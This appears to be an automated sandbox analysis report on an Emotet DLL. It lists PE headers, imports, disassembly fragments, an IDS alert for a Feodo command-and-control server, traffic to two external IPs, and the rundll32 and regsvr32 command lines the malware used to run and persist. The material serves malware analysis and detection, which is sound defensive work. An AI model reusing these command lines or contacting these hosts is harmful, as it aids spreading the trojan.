                                                                                                    mov dword ptr [ecx], eax
                                                                                                    dec eax
                                                                                                    mov eax, ecx
                                                                                                    ret
                                                                                                    int3
                                                                                                    inc eax
                                                                                                    push ebx
                                                                                                    dec eax
                                                                                                    sub esp, 20h
                                                                                                    dec eax
                                                                                                    mov ebx, ecx
                                                                                                    dec eax
                                                                                                    mov eax, edx
                                                                                                    dec eax
                                                                                                    lea ecx, dword ptr [00033EADh]
                                                                                                    dec eax
                                                                                                    mov dword ptr [ebx], ecx
                                                                                                    dec eax
                                                                                                    lea edx, dword ptr [ebx+08h]
                                                                                                    xor ecx, ecx
                                                                                                    dec eax
                                                                                                    mov dword ptr [edx], ecx
                                                                                                    dec eax
                                                                                                    mov dword ptr [edx+08h], ecx
                                                                                                    dec eax
                                                                                                    lea ecx, dword ptr [eax+08h]
                                                                                                    Programming Language:
                                                                                                    • [EXP] VS2015 UPD3.1 build 24215
                                                                                                    • [RES] VS2015 UPD3 build 24213
                                                                                                    • [LNK] VS2015 UPD3.1 build 24215
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x7cda00x58.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7cdf80x78.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x870000x1e0.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x820000x192c.pdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x66c.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x7a4100x1c.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7a4300x94.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x380000x370.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x36fd50x37000False0.38967507102272725data5.930785005703424IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x380000x4597a0x45a00False0.6705249943895871data6.275551505700209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x7e0000x33940xc00False0.18294270833333334DOS executable (block device driver \337-\231+])2.573523630872546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .pdata0x820000x192c0x1a00False0.4794170673076923data5.1711441720039435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .gfids0x840000xdc0x200False0.244140625Spectrum .TAP data "6 " - BASIC program1.1531659578770692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .gxfg0x850000x10000x1000False0.44091796875data5.088628746947821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .gehcont0x860000xc0x200False0.0390625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x870000x1e00x200False0.52734375data4.724728911998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x880000x66c0x800False0.537109375data4.9054360857170005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                    RT_MANIFEST0x870600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                    DLLImport
                                                                                                    KERNEL32.dllGetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, SetFilePointerEx, ExitProcess, GetStdHandle, GetProcessHeap, CreateFileW, CloseHandle, GetStringTypeW, LCMapStringW, GetFileType, VirtualAlloc, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, EncodePointer, RaiseException, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, WriteConsoleW
                                                                                                    USER32.dllEndPaint, BeginPaint, InvalidateRect, GetMessageW, DefWindowProcW, CloseTouchInputHandle, GetTouchInputInfo, DestroyWindow, MessageBoxW, CreateWindowExW, RegisterClassExW, LoadStringW, ShowWindow, DispatchMessageW, RegisterTouchWindow, MessageBoxA, UnregisterTouchWindow, TranslateAcceleratorW, TranslateMessage, LoadCursorW, PostQuitMessage, UpdateWindow
                                                                                                    GDI32.dllPolyline, LineTo, CreatePen, MoveToEx, DeleteObject, SelectObject
                                                                                                    ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                                                                    CRYPT32.dllCryptStringToBinaryA
                                                                                                    NameOrdinalAddress
                                                                                                    DllRegisterServer10x180013f70
                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States
                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                    192.168.2.4115.178.55.2249695802404304 11/13/22-17:51:55.664778TCP2404304ET CNC Feodo Tracker Reported CnC Server TCP group 34969580192.168.2.4115.178.55.22
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 13, 2022 18:03:24.933876038 CET4969780192.168.2.4115.178.55.22
                                                                                                    Nov 13, 2022 18:03:25.223747969 CET8049697115.178.55.22192.168.2.4
                                                                                                    Nov 13, 2022 18:03:25.726638079 CET4969780192.168.2.4115.178.55.22
                                                                                                    Nov 13, 2022 18:03:26.016370058 CET8049697115.178.55.22192.168.2.4
                                                                                                    Nov 13, 2022 18:03:26.523628950 CET4969780192.168.2.4115.178.55.22
                                                                                                    Nov 13, 2022 18:03:26.813407898 CET8049697115.178.55.22192.168.2.4
                                                                                                    Nov 13, 2022 18:03:32.346594095 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:32.512141943 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:32.512274981 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:32.556339025 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:32.721910000 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:32.737699032 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:32.737744093 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:32.738043070 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:32.777815104 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:32.943331957 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:32.944039106 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:32.993029118 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:36.506311893 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:36.506387949 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:36.672013044 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:36.672043085 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:37.316827059 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:37.399533033 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:40.315917969 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:40.315944910 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:40.316049099 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:40.316226006 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:40.316303015 CET496988080192.168.2.4172.105.115.71
                                                                                                    Nov 13, 2022 18:03:40.481724977 CET808049698172.105.115.71192.168.2.4
                                                                                                    Nov 13, 2022 18:03:40.481756926 CET808049698172.105.115.71192.168.2.4

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:18:02:38
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\loaddll64.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:loaddll64.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll"
                                                                                                    Imagebase:0x7ff60a890000
                                                                                                    File size:139776 bytes
                                                                                                    MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.320549270.000002C323270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    Target ID:1
                                                                                                    Start time:18:02:38
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7c72c0000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:2
                                                                                                    Start time:18:02:39
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1
                                                                                                    Imagebase:0x7ff632260000
                                                                                                    File size:273920 bytes
                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:3
                                                                                                    Start time:18:02:39
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\UNUy8dUYWp.dll
                                                                                                    Imagebase:0x7ff6c6ee0000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.318872069.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.319281932.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    Target ID:4
                                                                                                    Start time:18:02:39
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1
                                                                                                    Imagebase:0x7ff71a720000
                                                                                                    File size:69632 bytes
                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.316359005.0000015CC5300000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.315165942.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    Target ID:5
                                                                                                    Start time:18:02:39
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\UNUy8dUYWp.dll,DllRegisterServer
                                                                                                    Imagebase:0x7ff71a720000
                                                                                                    File size:69632 bytes
                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.316792444.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.317583500.00000225B3AC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    Target ID:6
                                                                                                    Start time:18:02:43
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll"
                                                                                                    Imagebase:0x7ff6c6ee0000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.699725237.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.700370184.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    Target ID:7
                                                                                                    Start time:18:02:44
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CoOkhAHrtQc\nRwgXrJuSZa.dll"
                                                                                                    Imagebase:0x7ff6c6ee0000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:8
                                                                                                    Start time:18:02:44
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GoWbi\ladheq.dll"
                                                                                                    Imagebase:0x7ff6c6ee0000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:9
                                                                                                    Start time:18:02:45
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RQcUhJCVUMzw\oVbDosZga.dll"
                                                                                                    Imagebase:0x7ff6c6ee0000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:12
                                                                                                    Start time:18:03:47
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll
                                                                                                    Imagebase:0x7ff6c6ee0000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.463551545.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.464095447.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                    Target ID:13
                                                                                                    Start time:18:03:53
                                                                                                    Start date:13/11/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\FWERpTiWwMFl\CxZPHYYNr.dll"
                                                                                                    Imagebase:0x7ff6c6ee0000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.1%
                                                                                                      Dynamic/Decrypted Code Coverage:3%
                                                                                                      Signature Coverage:10.3%
                                                                                                      Total number of Nodes:701
                                                                                                      Total number of Limit Nodes:11
                                                                                                      execution_graph 17097 7ff87c10aa18 17098 7ff87c10aa63 17097->17098 17102 7ff87c10aa27 __vcrt_getptd_noexit 17097->17102 17107 7ff87c10b420 17098->17107 17099 7ff87c10aa4a RtlAllocateHeap 17101 7ff87c10aa61 17099->17101 17099->17102 17102->17098 17102->17099 17104 7ff87c1097ec 17102->17104 17110 7ff87c109828 17104->17110 17116 7ff87c10ba4c GetLastError 17107->17116 17109 7ff87c10b429 17109->17101 17115 7ff87c10bd28 EnterCriticalSection 17110->17115 17112 7ff87c109835 17113 7ff87c10bd7c new LeaveCriticalSection 17112->17113 17114 7ff87c1097fa 17113->17114 17114->17102 17117 7ff87c10ba8d FlsSetValue 17116->17117 17118 7ff87c10ba70 17116->17118 17119 7ff87c10ba9f 17117->17119 17122 7ff87c10ba7d SetLastError 17117->17122 17118->17117 17118->17122 17133 7ff87c10aad0 17119->17133 17122->17109 17124 7ff87c10bacc FlsSetValue 17127 7ff87c10bad8 FlsSetValue 17124->17127 17128 7ff87c10baea 17124->17128 17125 7ff87c10babc FlsSetValue 17126 7ff87c10bac5 17125->17126 17140 7ff87c10a9dc 17126->17140 17127->17126 17146 7ff87c10b640 17128->17146 17139 7ff87c10aae1 __vcrt_getptd_noexit 17133->17139 17134 7ff87c10ab32 17136 7ff87c10b420 _set_errno_from_matherr 10 API calls 17134->17136 17135 7ff87c10ab16 RtlAllocateHeap 17137 7ff87c10ab30 17135->17137 17135->17139 17136->17137 17137->17124 17137->17125 17138 7ff87c1097ec new 2 API calls 17138->17139 17139->17134 17139->17135 17139->17138 17141 7ff87c10a9e1 RtlReleasePrivilege 17140->17141 17142 7ff87c10aa10 17140->17142 17141->17142 17143 7ff87c10a9fc GetLastError 17141->17143 17142->17122 17144 7ff87c10aa09 __free_lconv_num 17143->17144 17145 7ff87c10b420 _set_errno_from_matherr 9 API calls 17144->17145 17145->17142 17151 7ff87c10b518 17146->17151 17163 7ff87c10bd28 EnterCriticalSection 17151->17163 17165 18000be34 17168 180005db4 17165->17168 17167 18000bf4c 17169 180005df9 17168->17169 17170 1800060dd Process32FirstW 17169->17170 17171 180005e61 17169->17171 17170->17169 17171->17167 17172 7ff87c104394 17173 7ff87c1043ba 17172->17173 17174 7ff87c1043d1 dllmain_raw 17173->17174 17175 7ff87c1043c2 17173->17175 17180 7ff87c1043f1 17173->17180 17174->17175 17176 7ff87c1043e4 17174->17176 17189 7ff87c104194 17176->17189 17180->17175 17223 7ff87c113fb0 17180->17223 17181 7ff87c10443e 17181->17175 17182 7ff87c104194 84 API calls 17181->17182 17184 7ff87c104454 17182->17184 17183 7ff87c113fb0 75 API calls 17185 7ff87c104424 17183->17185 17184->17175 17186 7ff87c10445e dllmain_raw 17184->17186 17187 7ff87c104194 84 API calls 17185->17187 17186->17175 17188 7ff87c104431 dllmain_raw 17187->17188 17188->17181 17190 7ff87c1041d5 __scrt_acquire_startup_lock 17189->17190 17191 7ff87c10419c 17189->17191 17198 7ff87c10432e 17190->17198 17201 7ff87c104359 17190->17201 17202 7ff87c104944 __scrt_fastfail 7 API calls 17190->17202 17192 7ff87c1041a1 17191->17192 17193 7ff87c1041c9 17191->17193 17194 7ff87c1041a6 17192->17194 17195 7ff87c1041bc __scrt_dllmain_crt_thread_attach 17192->17195 17257 7ff87c103f18 17193->17257 17196 7ff87c1041ab 17194->17196 17272 7ff87c103e58 17194->17272 17197 7ff87c1041ba 17195->17197 17196->17180 17197->17180 17198->17180 17284 7ff87c103ed4 17201->17284 17202->17201 17204 7ff87c10435e 17289 7ff87c103f04 17204->17289 17205 7ff87c104206 __scrt_acquire_startup_lock 17207 7ff87c104232 17205->17207 17217 7ff87c10420a __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 17205->17217 17277 7ff87c104944 IsProcessorFeaturePresent 17205->17277 17265 7ff87c103e18 17207->17265 17210 7ff87c104369 __scrt_release_startup_lock 17293 7ff87c1040f0 17210->17293 17212 7ff87c104241 _RTC_Initialize 17212->17217 17268 7ff87c10416c 17212->17268 17216 7ff87c10425b 17218 7ff87c10416c shared_ptr 50 API calls 17216->17218 17217->17180 17219 7ff87c104267 __scrt_initialize_default_local_stdio_options 17218->17219 17220 7ff87c10a908 17 API calls 17219->17220 17221 7ff87c10427f 17220->17221 17221->17217 17222 7ff87c104283 __scrt_dllmain_after_initialize_c 17221->17222 17222->17217 17224 7ff87c113fe9 17223->17224 17226 7ff87c113fee __std_exception_copy __scrt_fastfail new 17223->17226 17635 7ff87c103a70 17224->17635 17480 7ff87c119970 17226->17480 17229 7ff87c1191fd 17230 7ff87c119970 49 API calls 17229->17230 17231 7ff87c119217 std::_Container_base12::~_Container_base12 17230->17231 17603 7ff87c119410 17231->17603 17235 7ff87c119268 17236 7ff87c101540 47 API calls 17235->17236 17237 7ff87c119275 17236->17237 17238 7ff87c119382 __scrt_fastfail 17237->17238 17239 7ff87c119282 17237->17239 17611 7ff87c119510 17238->17611 17619 7ff87c119f00 17239->17619 17243 7ff87c1192bb LoadStringW LoadStringW 17624 7ff87c113ed0 LoadCursorW RegisterClassExW 17243->17624 17244 7ff87c11929f MessageBoxA 17244->17224 17247 7ff87c119510 48 API calls 17247->17224 17248 7ff87c119308 17625 7ff87c113cb0 CreateWindowExW 17248->17625 17251 7ff87c11932d GetMessageW 17253 7ff87c119372 CoUninitialize 17251->17253 17254 7ff87c119344 TranslateAcceleratorW 17251->17254 17252 7ff87c119320 CoUninitialize 17252->17224 17253->17224 17255 7ff87c11935a TranslateMessage DispatchMessageW 17254->17255 17256 7ff87c119370 17254->17256 17255->17256 17256->17251 17258 7ff87c103f3a __isa_available_init 17257->17258 17297 7ff87c106ac0 17258->17297 17261 7ff87c103f43 17261->17205 17384 7ff87c103f64 17265->17384 17267 7ff87c103e23 17267->17212 17389 7ff87c10411c 17268->17389 17270 7ff87c104175 17271 7ff87c104b40 InitializeSListHead 17270->17271 17404 7ff87c10a86c 17272->17404 17278 7ff87c104969 __scrt_fastfail 17277->17278 17279 7ff87c104985 RtlCaptureContext RtlLookupFunctionEntry 17278->17279 17280 7ff87c1049ae RtlVirtualUnwind 17279->17280 17281 7ff87c1049ea __scrt_fastfail 17279->17281 17280->17281 17282 7ff87c104a1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17281->17282 17283 7ff87c104a6e 17282->17283 17283->17207 17285 7ff87c103edd __scrt_initialize_onexit_tables 17284->17285 17288 7ff87c103ef1 17285->17288 17472 7ff87c10a334 17285->17472 17288->17204 17290 7ff87c103f0f 17289->17290 17291 7ff87c1070b0 __vcrt_uninitialize_ptd 6 API calls 17290->17291 17292 7ff87c106b45 17291->17292 17292->17210 17294 7ff87c104101 __scrt_uninitialize_crt 17293->17294 17295 7ff87c104113 17294->17295 17296 7ff87c106b1c __vcrt_uninitialize 8 API calls 17294->17296 17295->17198 17296->17295 17298 7ff87c106ac9 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 17297->17298 17317 7ff87c107974 17298->17317 17304 7ff87c103f3f 17304->17261 17305 7ff87c10a844 17304->17305 17306 7ff87c10e02c 17305->17306 17307 7ff87c103f4c 17306->17307 17368 7ff87c10dfb0 17306->17368 17307->17261 17309 7ff87c106b1c 17307->17309 17310 7ff87c106b35 17309->17310 17311 7ff87c106b24 17309->17311 17310->17261 17312 7ff87c1070b0 __vcrt_uninitialize_ptd 6 API calls 17311->17312 17313 7ff87c106b29 17312->17313 17314 7ff87c1079bc __vcrt_uninitialize_locks DeleteCriticalSection 17313->17314 17315 7ff87c106b2e 17314->17315 17380 7ff87c107de4 17315->17380 17320 7ff87c10797c 17317->17320 17319 7ff87c1079ad 17322 7ff87c1079bc __vcrt_uninitialize_locks DeleteCriticalSection 17319->17322 17320->17319 17321 7ff87c106ad3 17320->17321 17334 7ff87c107d20 17320->17334 17321->17304 17323 7ff87c107070 17321->17323 17322->17321 17349 7ff87c107bbc 17323->17349 17325 7ff87c107080 17326 7ff87c106ae0 17325->17326 17354 7ff87c107cb8 17325->17354 17326->17304 17330 7ff87c1079bc 17326->17330 17328 7ff87c10709d 17328->17326 17359 7ff87c1070b0 17328->17359 17331 7ff87c1079e7 17330->17331 17332 7ff87c1079eb 17331->17332 17333 7ff87c1079ca DeleteCriticalSection 17331->17333 17332->17304 17333->17331 17339 7ff87c1079f4 17334->17339 17337 7ff87c107d77 InitializeCriticalSectionAndSpinCount 17338 7ff87c107d63 17337->17338 17338->17320 17340 7ff87c107a55 17339->17340 17341 7ff87c107a5a 17339->17341 17340->17341 17342 7ff87c107b22 17340->17342 17343 7ff87c107a8d LoadLibraryExW 17340->17343 17348 7ff87c107b00 FreeLibrary 17340->17348 17341->17337 17341->17338 17342->17341 17344 7ff87c107b31 GetProcAddress 17342->17344 17343->17340 17345 7ff87c107ab3 GetLastError 17343->17345 17344->17341 17346 7ff87c107b49 17344->17346 17345->17340 17347 7ff87c107abe LoadLibraryExW 17345->17347 17346->17341 17347->17340 17348->17340 17350 7ff87c1079f4 try_get_function 5 API calls 17349->17350 17351 7ff87c107be8 17350->17351 17352 7ff87c107bff TlsAlloc 17351->17352 17353 7ff87c107bf0 17351->17353 17352->17353 17353->17325 17355 7ff87c1079f4 try_get_function 5 API calls 17354->17355 17356 7ff87c107ceb 17355->17356 17357 7ff87c107d04 TlsSetValue 17356->17357 17358 7ff87c107cf3 17356->17358 17357->17358 17358->17328 17360 7ff87c1070bf 17359->17360 17361 7ff87c1070c4 17359->17361 17363 7ff87c107c10 17360->17363 17361->17326 17364 7ff87c1079f4 try_get_function 5 API calls 17363->17364 17365 7ff87c107c3b 17364->17365 17366 7ff87c107c51 TlsFree 17365->17366 17367 7ff87c107c43 17365->17367 17366->17367 17367->17361 17379 7ff87c10bd28 EnterCriticalSection 17368->17379 17370 7ff87c10dfc0 17371 7ff87c11060c 53 API calls 17370->17371 17372 7ff87c10dfc9 17371->17372 17373 7ff87c10dfd7 17372->17373 17374 7ff87c10ddb8 55 API calls 